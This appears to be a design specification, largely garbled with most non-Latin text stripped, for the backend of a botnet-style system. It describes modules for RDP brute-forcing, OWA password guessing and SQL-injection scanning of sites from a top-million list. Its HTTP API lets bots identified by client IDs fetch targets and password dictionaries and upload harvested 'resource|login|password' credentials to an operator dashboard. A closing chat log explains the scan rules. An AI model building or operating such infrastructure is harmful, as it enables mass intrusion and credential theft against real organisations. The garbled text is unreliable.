  BACKEND     
 



   :
1)      ;    
2)       .


 

       .
    :
-   (    ;   ,  )
-   .

    ,    :   
 c .    .
      :   ,    .

          .
  ; ,         .

  ,     . ,   
   -        " ".

  :
-  RDP (  API: rdp)
-  OWA (Outlook Web Access) (  API: owa)
-   - (SQLScan) (  API: sql)

    :
-   (  TOP Alexa https://s3.amazonaws.com/alexa-static/top-1m.csv.zip;        )
-    (   ) -   
-       -    ;   4 ;   

   RDP (       -     ):
-  : mode (brute|check)
-  () : dict (    gzip)
-     : freq (  >= 0; 0 -      ;
   0 -          )

   OWA:
-   ":": dict (    gzip)

   SQLScan:
- : rules ( )

  (  )     :
-     ,            
-           ,   
 ,    RDP       120 . ,
 500  "/"  500*120=60000 , ..  .

      "     " -     
      .


API BACKEND

API    HTTP-.
 ,      HTTP 200 OK,
  - HTTP 404 Not Found.
   ,    200   .

     Content-Length.
    Content-Disposition: chunked   Connection: close.

 URL API    /group/clientid/

  group    -  
  clientid - id 

           ,
  ,   .

 :  4  6 ;  3  -    ,  1..3  - 

 :     ,    ,  .
    <name>_XYYYYYYY,  name -   ,   -  
(    ,      ),
X -         (W - windows, L - linux, A - , M - Mac OS),
YYYYYYY - 3-7   major-version, minor-version  build       
(,  6.1 build 7600   617600).
   32   0-9, A-F.
 id  - QWERTY_W617600.11223344556677889900AABBCCDDEEFF.


GET /group/clientid/scantype/settingname HTTP/1.1
      (settingname)    .
      

GET /group/clientid/scantype/domains HTTP/1.1
    .
scantype -  .

     ,       
  -.
       ;   \r\n
Content-Type: text/plain

        ,
     .   , 
    .

         ,
   " ";          ,
     ,    .
    ,  404 Not Found.


GET /group/clientid/scantype/over HTTP/1.1
  ,   
    HTTP 200 OK,    .
,       ,   -   .
  -    .
  -    /domains
   ,      .
   ,   404.


GET /group/clientid/scantype/dict HTTP/1.1
     .
  -    ,     .
Content-Type: text/plain  application/gzip

POST /group/clientid/81 HTTP/1.1
  
  -  multipart/form-data   :
  data   -     32 -   ,   
  source - UTF-8    4096  -      ( , "OWA Passwords")
     ,    .

 ,  data   UTF-8   :

resource|login|password\n

     Unix (\n),   DOS (\r\n)
  resource -  ,    ( URL.   .  IP- . ).
  login
  password - 

     .   | ( )

    

HTTP 200 OK
Content-Type: ...
Content-Length: ...

/1/


 

     :
* dashboard
*  
*   

 dashboard            .
    :
-     "/ "
-   
- -    
-        
-  / 

  ,         :
-  
- 
-   .
            ,
   ( dashboard),     .
        ,      .

  "  ",        .
      
- - 
- clientid
- group
- IP address
-  

     .

   " ".
       .

***
[10:49:01] <A> Report interval, seconds  The module will report every N seconds about its status
[10:49:35] <A> Fetch request, seconds  The module will upload the vulnerabilities found to the server every N seconds
[10:50:44] <A> Rules   Scan Rules
[10:51:11] <A>  These are the scan rules for the module. XML format is
[10:52:36] <A> <rules>
  <rule>
    <name>rule name</name>
    <type>time|diff  (one of these two options)</type>
    <value1>probe value 1</value1>
    <value2>probe value 2</value2>
    <value3>probe value 3</value3>
   </rule>
   ...
   <rule>
     ...
   </rule>
</rules>

[10:52:52] <A> CHANGE IT ONLY WHEN YOU KNOW WHAT YOU ARE DOING!
[10:54:04] <A> Domains  These are the Internet domains to scan
[10:54:22] <A> Format is: plain text file; one domain per line; line separator is \n
[10:54:26] <A> Example:
[10:54:29] <A> www.site.com
[10:54:33] <A> domain.com
[10:54:34] <A> etc
[10:55:16] <A> Thead (1..10)   Scan threads number (1..10)
[10:56:31] <A> Time threshold (0..40)   Time threshold for time difference rules, seconds (0..40)
[10:58:35] <A>  Time difference rule finds vulnerability by comparing injected and non-injected page loading time
[10:59:05] <A> Threshold (0..1000)   Char threshold (0..1000) (number of characters)
[11:01:09] <A>  This value determines injection success for difference rules. When the injected page differs from the non-injected page by this number of characters
